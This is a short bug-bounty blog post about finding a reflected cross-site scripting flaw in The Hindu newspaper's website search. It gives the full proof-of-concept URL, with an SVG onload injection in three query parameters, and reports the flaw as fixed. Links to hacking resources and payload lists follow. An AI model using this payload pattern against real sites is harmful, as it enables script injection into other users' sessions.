Skip to main content

How I find Cross Site Script in THE HINDU website

I felt happy when I found the Cross Site Script vulnerability in the hindu newspaper website which is the most leading newspaper in India.It my pleasure that I helped them as a White Hat Web Application Security Researcher.
This is my First Finding.

                                                               About The Hindu
The Hindu is an English-language Indian daily newspaper. Headquartered at ChennaiThe Hindu was published weekly when it was launched in 1878, and started publishing daily in 1889. It is the second most circulated English-language newspaper in India, with average qualifying sales of 1.45 million copies as of Jan−Jun 2016.[4] The Hindu has its largest base of circulation in southern India, and is the most widely read English daily newspaper in Andhra PradeshTamil Nadu and KeralaTelanganaKarnataka.
It is my Honor that I helped The Hindu.

Here is a Proof of Concept of Cross Site Scripting Vulnerability in thehindu.com



Host: https://www.thehindu.com

P.O.C-http://www.thehindu.com/search/?q=%22+%2F%3E%3C%2Fp%3E%3Csvg%2Fonload%3Dprompt(document.domain)%3E&t=%22+%2F%3E%3C%2Fp%3E%3Csvg%2Fonload%3Dprompt(document.domain)%3E&au=%22+%2F%3E%3C%2Fp%3E%3Csvg%2Fonload%3Dprompt(document.domain)%3E

Status-Fixed.


                                           

Comments

Popular posts from this blog

Getting started with Bug Bounty!

Hey, Guys Hope you all are doing well. I started my journey in bug bounties around 1.5 years ago, and I am thankful to all the members of security community who share their knowledge to the community. I have learned a lot of things from them and I am still learning new things daily from fellow hackers, hacking is a continuous process and ultimately reflects a state of mind. I have received a lot of messages from people's asking me how to start, where to start in bug bounties. So I have decided to write a blog which contain as much information which helps for beginners. Quote- "Hacking is a lifelong Journey of Learning " Table of Content Introduction Reading Practicing Connect with community Ask Questions Motivation Certifications Conclusion Introduction What is bug bounty? To get a basic understanding of the role, the name itself is quite self-explanatory. A bug bounty hunter looks for bugs in applications and platforms, which they later

Ethical Hacking Resource

Book’s: Tangle Web Security Guide Web Hacking 101 The Basics of Web Hacking: Tools and Techniques to Attack the Web Learning Pentesting Android Devices Android Hacker’s Handbook Learning IOS Pentesting Practical IOT Security Burp Suite Tool Attack Approach Essential of Burp Suite Browser Plugin’s : Chrome  :  http://resources.infosecinstitute.com/19-extensions-to-turn-google-chrome-into-penetration-testing-tool/ Firefox  :  http://resources.infosecinstitute.com/use-firefox-browser-as-a-penetration-testing-tool-with-these-add-ons/ Tool’s: https://bugbountyforum.com/tools/ https://forum.bugcrowd.com/t/researcher-resources-tools/167 Bug Bounty References: https://github.com/ngalongc/bug-bounty-reference https://github.com/Hack-with-Github/Awesome-Hacking Payload’s: fuzzdb  —  https://github.com/fuzzdb-project/fuzzdb SecLists  —  https://github.com/danielmiessler/SecLists NickSanzotta  —  https://github.com/NickSanzotta/BurpIntruder